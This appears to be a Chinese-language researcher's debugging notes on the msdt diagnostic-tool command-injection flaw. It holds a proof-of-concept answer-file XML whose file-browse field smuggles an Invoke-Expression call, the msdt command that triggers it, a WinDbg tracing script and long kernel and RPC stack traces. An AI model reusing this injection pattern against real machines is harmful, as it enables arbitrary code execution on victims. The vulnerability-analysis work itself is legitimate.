测试样本
1.xml:
<?xml version="1.0" encoding="utf-8"?>
<Answers Version="1.0">
<Interaction ID="IT_LaunchMethod">
<Value>ContextMenu</Value>
</Interaction>
<Interaction ID="IT_SelectProgram">
<Value>NotListed</Value>
</Interaction>
<Interaction ID="IT_BrowseForFile">
<Value>/../../$(Invoke-Expression('calc.exe'))/.exe</Value>
</Interaction>
</Answers>
复现步骤:
CMD运行命令:msdt /af C:\Users\yellowboy\Desktop\1.xml /id PCWDiagnostic /skip force
Windbg双机调试:
调试脚本
r @$t0=rdx+b8;
r? @$t1= *(nt!_RTL_USER_PROCESS_PARAMETERS**) @$t0;
as /msu path @@c++(&@$t1->ImagePathName);
.block{
.if($spat("${path}","*your-target-name*")){
.printf "\n[*] The blocked ImagePathName is: %mu \n[*] Its CommandLine is: %mu \n" ,@@c++(@$t1->ImagePathName.Buffer), @@c++(@$t1->CommandLine.Buffer);
.printf "[+] Its entry point is: %P\n" ,poi(rdx+28);
ad*;
.printf "[+] nt!_EPROCESS is: %P\n\n" ,@r8;
!process @r8;
.reload;
.printf "\n\n========This is the thread that created the target process========\n\n";
!thread @$thread;
}
.else{
.printf "\n[*] The ImagePathName that is passed is: %mu \n[*] Its CommandLine is: %mu \n\n" ,@@c++(@$t1->ImagePathName.Buffer),@@c++(@$t1->CommandLine.Buffer);
ad*;
gc;
}
}
调试命令:
bu nt!PspUpdateCreateInfo "j (rcx==6) '$$><[your script path]'; 'gc'"
调试
调试输出:
[] Pass : ImagePath is: C:\Windows\system32\msdt.exe [] Pass : CMD is: msdt /af C:\Users\yellowboy\Desktop\1.xml /id PCWDiagnostic /skip force
[] Pass : ImagePath is: C:\Windows\System32\sdiagnhost.exe [] Pass : CMD is: C:\Windows\System32\sdiagnhost.exe -Embedding
[] Pass : ImagePath is: ??\C:\Windows\system32\conhost.exe [] Pass : CMD is: ??\C:\Windows\system32\conhost.exe
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe [] Pass : CMD is: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\yellowboy\AppData\Local\Temp\usyf9diy.cmdline"
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe [] Pass : CMD is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\YELLOW~1\AppData\Local\Temp\RES4569.tmp" "c:\Users\yellowboy\AppData\Local\Temp\CSC4568.tmp"
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe [] Pass : CMD is: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\yellowboy\AppData\Local\Temp\4u9q9klc.cmdline"
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe [] Pass : CMD is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\YELLOW~1\AppData\Local\Temp\RES47D9.tmp" "c:\Users\yellowboy\AppData\Local\Temp\CSC47D8.tmp"
[] Block ImagePath is: C:\Windows\system32\calc.exe [] Block CMD is: "C:\Windows\system32\calc.exe"
堆栈:
msdt RPC通信启动服务过程:
1: kd> !thread /t 0x1af0
THREAD ffffab0fd0f82080 Cid 0d44.1af0 Teb: 000000c32b520000 Win32Thread: ffffab0fce614520 WAIT: (WrLpcReply) UserMode Non-Alertable
ffffab0fd0f82508 Semaphore Limit 0x1
Waiting for reply to ALPC Message ffff9a86331a6c60 : queued at port ffffab0fcf0c1aa0 : owned by process ffffab0fcf1682c0
Not impersonating
DeviceMap ffff9a862f4972b0
Owning Process ffffab0fcfc34340 Image: msdt.exe
Attached Process N/A Image: N/A
Wait Start TickCount 76561 Ticks: 0
Context Switch Count 132 IdealProcessor: 0\
UserTime 00:00:00.031
KernelTime 00:00:00.046
Win32 Start Address 0x00007ff618406630
Stack Init ffffe385b785ac90 Current ffffe385b785a4b0
Base ffffe385b785b000 Limit ffffe385b7855000 Call 0000000000000000
Priority 11 BasePriority 8 PriorityDecrement 2 IoPriority 2 PagePriority 5
1: kd> .thread /r /p ffffab0fd0f82080 ;kv
Implicit thread is now ffffab0f`d0f82080
Implicit process is now ffffab0f`cfc34340
.cache forcedecodeuser done
Loading User Symbols
..............................................................
\*\*\*\*\*\*\*\*\*\*\*\*\* Symbol Loading Error Summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*
Module name Error
SharedUserData No error - symbol load deferred
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
\*\*\* Stack trace for last set context - .thread/.cxr resets it
# Child-SP RetAddr : Args to Child : Call Site
00 ffffe385`b785a4f0 fffff803`0a86aad4 : 00000000`00000000 ffffd201`9f7c8180 ffffe385`00000000 ffffab0f`d0f82080 : nt!KiSwapContext+0x76
01 ffffe385`b785a630 fffff803`0a8657ca : ffffab0f`00000000 00000000`00000000 ffffab0f`d0f82080 fffff803`0a88b72a : nt!KiSwapThread+0x190
02 ffffe385`b785a6a0 fffff803`0a866fb0 : ffffab0f`d0f82508 ffffab0f`00000000 ffffe385`00000000 ffffab0f`d0f82508 : nt!KiCommitThreadWait+0x13a
03 ffffe385`b785a750 fffff803`0a84bd02 : 00000000`00000001 00000000`00000011 ffffab0f`d0f82501 ffffab0f`d0adb200 : nt!KeWaitForSingleObject+0x140
04 ffffe385`b785a7f0 fffff803`0a84bc90 : 00000000`00000000 ffffab0f`d0f82508 00000000`00000011 00000000`00000000 : nt!AlpcpWaitForSingleObject+0x3e
05 ffffe385`b785a830 fffff803`0abc702b : 00000000`00020000 ffffe385`b785aa49 ffffab0f`d0adb2d0 ffffab0f`d0f82508 : nt!AlpcpSignalAndWait+0x54
06 ffffe385`b785a870 fffff803`0abc6cf7 : ffffe385`b785a950 00000000`00020000 ffffe385`b785aa49 000001fd`58c8bff0 : nt!AlpcpReceiveSynchronousReply+0x57
07 ffffe385`b785a8d0 fffff803`0abcaa8f : ffffab0f`d0adb2d0 00000000`00020000 000001fd`58c8bff0 000001fd`58c985a8 : nt!AlpcpProcessSynchronousRequest+0x1a7
08 ffffe385`b785a9d0 fffff803`0a9af275 : ffffab0f`d0f82080 000000c3`2b77cd38 ffffe385`b785aaa8 000001fd`58c981a0 : nt!NtAlpcSendWaitReceivePort+0x17f
09 ffffe385`b785aa90 00007ff8`fafabf04 : 00007ff8`f96a6eb2 000000c3`2b77cf50 000001fd`58c98230 000001fd`58c981a0 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffe385`b785ab00)
0a 000000c3`2b77cd18 00007ff8`f96a6eb2 : 000000c3`2b77cf50 000001fd`58c98230 000001fd`58c981a0 00000000`00000000 : ntdll!NtAlpcSendWaitReceivePort+0x14
0b 000000c3`2b77cd20 00007ff8`f96a4001 : 000001fd`550764a0 000001fd`58c98480 000000c3`2b77cf50 000001fd`58c98230 : RPCRT4!LRPC_BASE_CCALL::DoSendReceive+0x112
0c 000000c3`2b77cdd0 00007ff8`f968e93f : 00000000`00000000 000001fd`58c98230 000001fd`5514f770 00000000`00000091 : RPCRT4!LRPC_CCALL::SendReceive+0x51
0d 000000c3`2b77ce20 00007ff8`faaf3555 : 000001fd`58c981a0 000001fd`55070150 000001fd`58c987e0 00007ff8`faf248ea : RPCRT4!I_RpcSendReceive+0x6f
0e 000000c3`2b77ce50 00007ff8`faaf2608 : 000001fd`00000000 000001fd`550a9790 000001fd`550a9790 00000000`00000380 : combase!CMessageCall::RpcSendRequestReceiveResponse+0xb5 [onecore\com\combase\dcomrem\call.cxx @ 4209]
0f (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!ThreadSendReceive+0xc0 (Inline Function @ 00007ff8`faaf2608) [onecore\com\combase\dcomrem\channelb.cxx @ 7378]
10 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!CSyncClientCall::SwitchAptAndDispatchCall+0x151 (Inline Function @ 00007ff8`faaf2608) [onecore\com\combase\dcomrem\channelb.cxx @ 5900]
11 000000c3`2b77d030 00007ff8`faac7bd4 : 00000000`00000005 00000000`00000190 000000c3`00000003 000001fd`58c845f0 : combase!CSyncClientCall::SendReceive2+0x248 [onecore\com\combase\dcomrem\channelb.cxx @ 5459]
12 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!SyncClientCallRetryContext::SendReceiveWithRetry+0x25 (Inline Function @ 00007ff8`faac7bd4) [onecore\com\combase\dcomrem\callctrl.cxx @ 1542]
13 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!CSyncClientCall::SendReceiveInRetryContext+0x25 (Inline Function @ 00007ff8`faac7bd4) [onecore\com\combase\dcomrem\callctrl.cxx @ 565]
14 000000c3`2b77d530 00007ff8`faac3dbb : 000000c3`2b77d690 000001fd`58c845f0 000000c3`2b77d980 00000000`00000000 : combase!DefaultSendReceive+0x64 [onecore\com\combase\dcomrem\callctrl.cxx @ 523]
15 000000c3`2b77d590 00007ff8`faacb2b4 : 000070dc`3de1e182 00000000`00000004 000000c3`2b77d9e0 00000000`00000001 : combase!CSyncClientCall::SendReceive+0x18b [onecore\com\combase\dcomrem\ctxchnl.cxx @ 783]
16 000000c3`2b77d7c0 00007ff8`fab4030e : 000000c3`2b77d9e0 000000c3`2b77df80 00000000`00000000 00000000`00000001 : combase!CClientChannel::SendReceive+0x84 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 655]
17 000000c3`2b77d830 00007ff8`f9739d84 : 00007ff8`f9688e00 000000c3`00000000 000000c3`2b77df80 00000000`00000000 : combase!NdrExtpProxySendReceive+0x4e [onecore\com\combase\ndr\ndrole\proxy.cxx @ 2002]
18 000000c3`2b77d860 00007ff8`fab3a3b8 : 00007ff8`facf3080 000000c3`2b77dfb0 ffffffff`00000000 00000000`00000000 : RPCRT4!NdrpClientCall3+0x3a4
19 000000c3`2b77dbd0 00007ff8`fabb6b32 : 00000000`00000005 00000000`00000000 00000000`00000000 000000c3`2b77e0b0 : combase!ObjectStublessClient+0x138 [onecore\com\combase\ndr\ndrole\amd64\stblsclt.cxx @ 369]
1a 000000c3`2b77df60 00007ff8`faafe381 : 000001fd`58c75b38 00000000`00000000 000000c3`2b77e768 000000c3`2b77e000 : combase!ObjectStubless+0x42 [onecore\com\combase\ndr\ndrole\amd64\stubless.asm @ 176]
1b 000000c3`2b77dfb0 00007ff8`fab63206 : 000000c3`2b77e768 000000c3`2b77f008 00000000`00000000 000000c3`2b77e1d0 : combase!CRpcResolver::DelegateActivationToSCM+0x4b5 [onecore\com\combase\dcomrem\resolver.cxx @ 2283]
1c 000000c3`2b77e170 00007ff8`faafcf05 : 000000c3`2b77e768 000000c3`2b77e400 000000c3`2b77e1d0 00000000`00000000 : combase!CRpcResolver::CreateInstance+0x1a [onecore\com\combase\dcomrem\resolver.cxx @ 2491]
1d 000000c3`2b77e1a0 00007ff8`fab00610 : 000000c3`2b77e768 ffffff3c`d4881ad0 00000000`00000040 00000000`80004005 : combase!CClientContextActivator::CreateInstance+0x135 [onecore\com\combase\objact\actvator.cxx @ 616]
1e 000000c3`2b77e450 00007ff8`fab0b7ba : 00000000`00000000 000000c3`2b77ef90 00000000`00000001 00000000`00000000 : combase!ActivationPropertiesIn::DelegateCreateInstance+0x90 [onecore\com\combase\actprops\actprops.cxx @ 1983]
1f 000000c3`2b77e4e0 00007ff8`fab0a289 : 000000c3`2b77f6b8 00007ff8`faf30d9a 00000804`00000000 000001fd`551b3272 : combase!ICoCreateInstanceEx+0x90a [onecore\com\combase\objact\objact.cxx @ 2028]
20 000000c3`2b77f3b0 00007ff8`fab0a0cc : 00000000`00000001 00007ff8`fa05c1de 000001fd`58c46c58 00000000`00000000 : combase!CComActivator::DoCreateInstance+0x169 [onecore\com\combase\objact\immact.hxx @ 386]
21 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!CoCreateInstanceEx+0xd1 (Inline Function @ 00007ff8`fab0a0cc) [onecore\com\combase\objact\actapi.cxx @ 177]
22 000000c3`2b77f510 00007ff8`f4139964 : 00000000`00000000 00000000`00000000 000000c3`2b77f609 000001fd`551bd300 : combase!CoCreateInstance+0x10c [onecore\com\combase\objact\actapi.cxx @ 121]
23 000000c3`2b77f5b0 00007ff8`f413894f : 00000000`00000000 00000000`00000000 000001fd`5a0c9b50 000001fd`551bd300 : sdiageng!CScriptedDiag::InitializeHost+0x130
24 000000c3`2b77f670 00007ff6`1841f876 : 00000000`00000000 000000c3`2b77f780 00000000`00000000 00007ff6`18423cde : sdiageng!CScriptedDiag::Diagnose+0x12f //重要
25 000000c3`2b77f750 00007ff6`18416da9 : 00000000`00000000 000001fd`55074ce8 000001fd`551bd300 00000000`00000000 : msdt!PackageCollection::Diagnose+0x166
26 000000c3`2b77f7b0 00007ff6`18413c36 : 000001fd`551b60a0 00000000`00000000 00000000`00000001 000000c3`2b77f848 : msdt!Package_Diagnose+0x51
27 000000c3`2b77f7f0 00007ff6`184069ad : 00000000`00000000 00000000`00000000 000001fd`551bd740 00000000`00000000 : msdt!Packages_Diagnose+0x176
28 000000c3`2b77f890 00007ff8`f9556fd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msdt!WorkerThread+0x37d
29 000000c3`2b77f8f0 00007ff8`faf5cec1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
2a 000000c3`2b77f920 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000\`00000000 : ntdll!RtlUserThreadStart+0x21
与msiexec启动服务的流程差不多《ISCMLocalActivator》:
msdt-》svchost
1: kd> dt _guid 000000c3`2b77dd34
combase!_GUID
{00000136-0000-0000-c000-000000000046}
+0x000 Data1 : 0x136
+0x004 Data2 : 0
+0x006 Data3 : 0
+0x008 Data4 : [8] "???"
procnum:0x4
svchost-》svchost
1: kd> dt 00007ff8`f6795d50+4 _guid
ntdll!_GUID
{9b8699ae-0e44-47b1-8e7f-86a461d7ecdc}
+0x000 Data1 : 0x9b8699ae
+0x004 Data2 : 0xe44
+0x006 Data3 : 0x47b1
+0x008 Data4 : [8] "???"
1: kd> dw 00007ff8`f6792922+6 //RPCRT4!NdrpClientCall2:arg2(word ptr【pFormat+6】)
00007ff8\`f6792928 0000
procnum:0x0
1: kd> .thread /p /r ffffab0fd0fe8080 ;kv
Implicit thread is now ffffab0f`d0fe8080
Implicit process is now ffffab0f`cf1682c0
.cache forcedecodeuser done
Loading User Symbols
........................................
\*\*\*\*\*\*\*\*\*\*\*\*\* Symbol Loading Error Summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*
Module name Error
SharedUserData No error - symbol load deferred
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
\*\*\* Stack trace for last set context - .thread/.cxr resets it
00 ffffe385`b81174f0 fffff803`0a86aad4 : 00000000`00000000 ffffd201`9f7c8180 ffffe385`00000000 ffffab0f`d0fe8080 : nt!KiSwapContext+0x76
01 ffffe385`b8117630 fffff803`0a8657ca : ffffab0f`00000000 00000000`00000000 ffffab0f`d0fe8080 fffff803`0a88b72a : nt!KiSwapThread+0x190
02 ffffe385`b81176a0 fffff803`0a866fb0 : ffffab0f`d0fe8508 ffffab0f`00000000 ffffe385`00000000 ffffab0f`d0fe8508 : nt!KiCommitThreadWait+0x13a
03 ffffe385`b8117750 fffff803`0a84bd02 : 00000000`00000001 00000000`00000011 ffffab0f`d0fe8501 ffffab0f`cf159a00 : nt!KeWaitForSingleObject+0x140
04 ffffe385`b81177f0 fffff803`0a84bc90 : 00000000`00000000 ffffab0f`d0fe8508 00000000`00000011 00000000`00000000 : nt!AlpcpWaitForSingleObject+0x3e
05 ffffe385`b8117830 fffff803`0abc702b : 00000000`00020000 ffffe385`b8117a49 ffffab0f`cf159a80 ffffab0f`d0fe8508 : nt!AlpcpSignalAndWait+0x54
06 ffffe385`b8117870 fffff803`0abc6cf7 : ffffe385`b8117950 00000000`00020000 ffffe385`b8117a49 00000233`750b3570 : nt!AlpcpReceiveSynchronousReply+0x57
07 ffffe385`b81178d0 fffff803`0abcaa8f : ffffab0f`cf159a80 00000000`00020000 00000233`750b3570 00000233`75078868 : nt!AlpcpProcessSynchronousRequest+0x1a7
08 ffffe385`b81179d0 fffff803`0a9af275 : ffffab0f`d0fe8080 00000069`8b97d018 ffffe385`b8117aa8 00007ff8`f9752e24 : nt!NtAlpcSendWaitReceivePort+0x17f
09 ffffe385`b8117a90 00007ff8`fafabf04 : 00007ff8`f96a3d9f 00000069`8b97d850 00000069`8b97d350 00000069`8b97d760 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffe385`b8117b00)
0a 00000069`8b97cff8 00007ff8`f96a3d9f : 00000069`8b97d850 00000069`8b97d350 00000069`8b97d760 00000069`8b97d350 : ntdll!NtAlpcSendWaitReceivePort+0x14
0b 00000069`8b97d000 00007ff8`f96b8c87 : 00000000`00000000 00007ff8`f6788160 00000069`8b97d1a0 00000069`8b97d850 : RPCRT4!LRPC_BASE_CCALL::SendReceive+0x12f
0c 00000069`8b97d0d0 00007ff8`f96617f0 : 00000000`00000000 00000233`75010270 00000069`8b97d850 00000000`00000000 : RPCRT4!NdrpSendReceive+0x97
0d 00000069`8b97d100 00007ff8`f966120f : 00000069`8b97d8b0 007b003a`0054004e 00360038`00300038 00340044`00420045 : RPCRT4!NdrpClientCall2+0x5d0
0e 00000069`8b97d720 00007ff8`f6696ad8 : 00000000`00000000 00007ff8`f6792922 00000233`75010270 00000069`8b97d820 : RPCRT4!NdrClientCall2+0x1f
0f 00000069`8b97d750 00007ff8`f66c7c96 : 00000000`00000000 00000000`00000000 00000069`00000001 00000233`75bf1040 : rpcss!CClassicComClassData::LaunchActivatorServer+0x178
10 00000069`8b97d8a0 00007ff8`f66b62b4 : 00000233`75bd8290 00000000`00000000 00000069`8b97dc90 00000069`8b97dd68 : rpcss!CServerTableEntry::StartServerAndWait+0x2de
11 00000069`8b97dc40 00007ff8`f66b54c0 : 00000000`00000000 00000000`00000000 00000000`00000000 00000233`75b63c70 : rpcss!Activation+0xa04
12 00000069`8b97def0 00007ff8`f66d71a9 : 00000069`8b97e620 00000069`8b97e3f8 00000233`75085578 00000233`75084e40 : rpcss!ActivateFromProperties+0x230
13 00000069`8b97dfe0 00007ff8`f66b49f6 : 00000000`00000000 00000069`8b97e180 00000233`75085088 00000233`75084e01 : rpcss!ActivationPropertiesIn::DelegateCreateInstance+0x99
14 00000069`8b97e080 00007ff8`f66b1207 : 00000069`8b97e4a0 00000000`00000000 00000069`8b97e4a0 00000000`00000000 : rpcss!ActivateFromPropertiesPreamble+0x2406
15 00000069`8b97e3a0 00007ff8`f66ac501 : 00000233`755d8b60 00000233`000000a0 00000069`8b97e7e0 00007ff8`f66a071e : rpcss!PerformScmStage+0x9e7
16 00000069`8b97e5d0 00007ff8`f96d2033 : 00000233`755d8b60 00000233`75573590 00000233`75bed040 00000069`8b97ef70 : rpcss!SCMActivatorCreateInstance+0x1b1
17 00000069`8b97e900 00007ff8`f967c837 : 00007ff8`f679d3f2 00000069`8b97ed90 00000233`755fde00 00007ff8`00000000 : RPCRT4!Invoke+0x73
18 00000069`8b97e980 00007ff8`f96bd8ba : 00000069`8b97f240 00000014`00000004 00000000`00000014 00007ff8`faf4f4cd : RPCRT4!NdrStubCall2+0x727
19 00000069`8b97efe0 00007ff8`f96b6708 : 00000233`75037154 00000233`00000001 00000233`755d8b60 00000000`00000000 : RPCRT4!NdrServerCall2+0x1a
1a 00000069`8b97f010 00007ff8`f9699196 : 00000233`74f40000 00000233`7504daa0 00000069`8b97f210 00000233`74f40900 : RPCRT4!DispatchToStubInCNoAvrf+0x18
1b 00000069`8b97f060 00007ff8`f9698ae8 : 00000233`7504daa0 00000000`00000000 00000000`00000000 00000000`00000000 : RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1a6
1c 00000069`8b97f140 00007ff8`f96a72ff : 00000000`00000000 00007ff8`faf28282 00000233`755d8b60 00007ff8`faf6e4c1 : RPCRT4!RPC_INTERFACE::DispatchToStub+0xf8
1d 00000069`8b97f1b0 00007ff8`f96a6708 : 00000000`00040437 00000000`00000005 00000000`00000000 00000233`755fde00 : RPCRT4!LRPC_SCALL::DispatchRequest+0x31f
1e 00000069`8b97f280 00007ff8`f96a5cf1 : 00000000`00000000 00000233`755d7080 00000000`00000000 00000233`74fb0000 : RPCRT4!LRPC_SCALL::HandleRequest+0x7f8
1f 00000069`8b97f390 00007ff8`f96a575e : 00000000`00000000 00000000`00000000 00000000`00000001 00000233`7501e9f0 : RPCRT4!LRPC_ADDRESS::HandleRequest+0x341
20 00000069`8b97f430 00007ff8`f96a9ce2 : 00000000`00000000 00000233`755fde00 00000233`7501eaf8 00000069`8b97f808 : RPCRT4!LRPC_ADDRESS::ProcessIO+0x89e
21 00000069`8b97f570 00007ff8`faf4f220 : 00000001`00000bc6 00000000`00000000 00000069`8b97f808 00000000`00000184 : RPCRT4!LrpcIoComplete+0xc2
22 00000069`8b97f610 00007ff8`faf22536 : 00000000`00000000 00000233`7501eb00 00000000`00000000 00000233`75b69cb0 : ntdll!TppAlpcpExecuteCallback+0x260
23 00000069`8b97f690 00007ff8`f9556fd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!TppWorkerThread+0x456
24 00000069`8b97f990 00007ff8`faf5cec1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
25 00000069`8b97f9c0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000\`00000000 : ntdll!RtlUserThreadStart+0x21
\[*] Block ImagePath is: C:\Windows\System32\sdiagnhost.exe
\[*] Block CMD is: C:\Windows\System32\sdiagnhost.exe -Embedding
启动服务创建进程sdiagnhost.exe
1: kd> !thread ffffab0fcf1a9080
THREAD ffffab0fcf1a9080 Cid 0358.03dc Teb: 0000006213abf000 Win32Thread: ffffab0fd0c41dd0 RUNNING on processor 1
Impersonation token: ffff9a8632d0c570 (Level Impersonation)
DeviceMap ffff9a862f4972b0
Owning Process ffffab0fcf0d9240 Image: svchost.exe
Attached Process N/A Image: N/A
Wait Start TickCount 76561 Ticks: 0
Context Switch Count 2809 IdealProcessor: 0\
UserTime 00:00:00.078
KernelTime 00:00:00.125
Win32 Start Address ntdll!TppWorkerThread (0x00007ff8faf220e0)
Stack Init ffffe385b6b75c90 Current ffffe385b6b75520
Base ffffe385b6b76000 Limit ffffe385b6b70000 Call 0000000000000000
Priority 11 BasePriority 8 PriorityDecrement 48 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
ffffe385`b6b74d98 fffff803`0ab7547a : 00000000`000022bf ffffe385`b6b75350 00000000`00000000 00000000`00000000 : nt!MmCreatePeb
ffffe385`b6b74da0 fffff803`0aba8b6d : 00000000`00000000 ffffe385`b6b75350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x1162
ffffe385`b6b752d0 fffff803`0a9af275 : 00000000`00000002 00000000`00000001 00000000`00000000 00000247`d7839850 : nt!NtCreateUserProcess+0x6ed
ffffe385`b6b75a90 00007ff8`fafac684 : 00007ff8`f86d876c 00000000`00000000 00000062`141fe450 00000000`00000001 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffe385`b6b75b00)
00000062`141fcd58 00007ff8`f86d876c : 00000000`00000000 00000062`141fe450 00000000`00000001 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
00000062`141fcd60 00007ff8`f86d6083 : 00000000`00000660 00007ff8`f66cf197 00000247`d8217d10 00000062`141fe460 : KERNELBASE!CreateProcessInternalW+0xfcc
00000062`141fe270 00007ff8`f955dac0 : 00000062`00000008 00000000`00000660 00100001`00000030 00000000`00000000 : KERNELBASE!CreateProcessAsUserW+0x63
00000062`141fe2e0 00007ff8`f66ca95e : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!CreateProcessAsUserWStub+0x60
00000062`141fe350 00007ff8`f66d027f : 00000247`d8933680 00000247`d826c720 00000062`141fe899 00000000`00000000 : rpcss!CClassData::PrivilegedLaunchActivatorServer+0x79a
00000062`141fe7e0 00007ff8`f66d03bd : 00000247`d89bb510 00000247`d826c720 00000000`00000660 00000000`00000000 : rpcss!<lambda_cc7c03200483d218cdd1c387096ab1c1>::operator()+0x17b
00000062`141fe900 00007ff8`f96d2033 : 00000247`d78fcb20 00000247`d82681c8 00000247`d826821c 00000000`00000650 : rpcss!_LaunchActivatorServer+0xed
00000062`141fe9d0 00007ff8`f967c837 : 00007ff8`f679e9f2 00000062`141fee90 00000247`d7873bf0 00007ff8`00000000 : RPCRT4!Invoke+0x73
00000062`141fea80 00007ff8`f96bd8ba : 00007ff8`f6108250 00007ff8`f61093f0 00000062`141ff110 00007ff8`faf4f4cd : RPCRT4!NdrStubCall2+0x727
00000062`141ff0e0 00007ff8`f96b6708 : 00000000`00000000 00007ff8`00000001 00000000`00000003 000d8945`00000000 : RPCRT4!NdrServerCall2+0x1a
00000062`141ff110 00007ff8`f9699196 : 00000000`00000080 00000247`d783fef0 00000062`141ff310 00000000`00000000 : RPCRT4!DispatchToStubInCNoAvrf+0x18
00000062`141ff160 00007ff8`f9698ae8 : 00000247`d783fef0 00000000`00000000 00000000`00000000 00007ff8`f6698f3f : RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1a6
00000062`141ff240 00007ff8`f96a72ff : 00000000`00000000 00007ff8`faf1721b 00000247`d78fcb20 00007ff8`faf6e4c1 : RPCRT4!RPC_INTERFACE::DispatchToStub+0xf8
00000062`141ff2b0 00007ff8`f96a6708 : 00000000`00040437 00000000`00000001 00000000`00000000 00000247`d7873bf0 : RPCRT4!LRPC_SCALL::DispatchRequest+0x31f
00000062`141ff380 00007ff8`f96a5cf1 : 00000247`d826a340 00000247`d783d0d0 00000000`00000000 00000000`00000000 : RPCRT4!LRPC_SCALL::HandleRequest+0x7f8
00000062`141ff490 00007ff8`f96a575e : 00000000`00000000 00000000`00000000 00000000`00000001 00000247`d783f6a0 : RPCRT4!LRPC_ADDRESS::HandleRequest+0x341
00000062`141ff530 00007ff8`f96a9ce2 : 00000000`00000000 00000247`d7873bf0 00000247`d783f7a8 00000062`141ff908 : RPCRT4!LRPC_ADDRESS::ProcessIO+0x89e
00000062`141ff670 00007ff8`faf4f220 : 00000001`00000000 00000000`00000000 00000062`141ff908 00000000`00000080 : RPCRT4!LrpcIoComplete+0xc2
00000062`141ff710 00007ff8`faf22536 : 00000000`00000000 00000247`d7802300 00000000`00000000 00000247`d7867130 : ntdll!TppAlpcpExecuteCallback+0x260
00000062`141ff790 00007ff8`f9556fd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!TppWorkerThread+0x456
00000062`141ffa90 00007ff8`faf5cec1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000062`141ffac0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000\`00000000 : ntdll!RtlUserThreadStart+0x21
RPC执行脚本过程:
客户端: {72b05d8b-258d-469d-a4d1-d142e823394c}: IID IScriptedDiagnosticHost
1: kd> dt 00000000\`03e62eb4 \_guid
ntdll!\_GUID
{72b05d8b-258d-469d-a4d1-d142e823394c}
+0x000 Data1 : 0x72b05d8b
+0x004 Data2 : 0x258d
+0x006 Data3 : 0x469d
+0x008 Data4 : \[8] "???"
porcnum:0x4
1: kd> .thread /p /r fffffa80321fe060;!thread fffffa80321fe060
Implicit thread is now fffffa80`321fe060
Implicit process is now fffffa80\`313ff7a0
.cache forcedecodeuser done
Loading User Symbols
......................................................
\*\*\*\*\*\*\*\*\*\*\*\*\* Symbol Loading Error Summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*
Module name Error
SharedUserData No error - symbol load deferred
360Hvm64 The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
THREAD fffffa80321fe060 Cid 0858.0314 Teb: 000007fffffd7000 Win32Thread: fffff900c1d47010 WAIT: (WrLpcReply) UserMode Non-Alertable
fffffa80321fe420 Semaphore Limit 0x1
Waiting for reply to ALPC Message fffff8a006dbf6c0 : queued at port fffffa8032b13090 : owned by process fffffa803135f300
IRP List:
fffffa8032da9c60: (0006,03a0) Flags: 00060000 Mdl: 00000000
Not impersonating
DeviceMap fffff8a0012438b0
Owning Process fffffa80313ff7a0 Image: msdt.exe
Attached Process N/A Image: N/A
Wait Start TickCount 251709 Ticks: 0
Context Switch Count 277 IdealProcessor: 1 LargeStack
UserTime 00:00:00.171
KernelTime 00:00:00.639
Win32 Start Address msdt!WorkerThread (0x00000000ff5aa164)
Stack Init fffff88006c0cc70 Current fffff88006c0c330
Base fffff88006c0d000 Limit fffff88006c04000 Call 0000000000000000
Priority 10 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
fffff880`06c0c370 fffff800`028e8992 : fffff8a0`085a9a00 fffffa80`321fe060 fffff8a0`00000000 00000000`00020001 : nt!KiSwapContext+0x7a
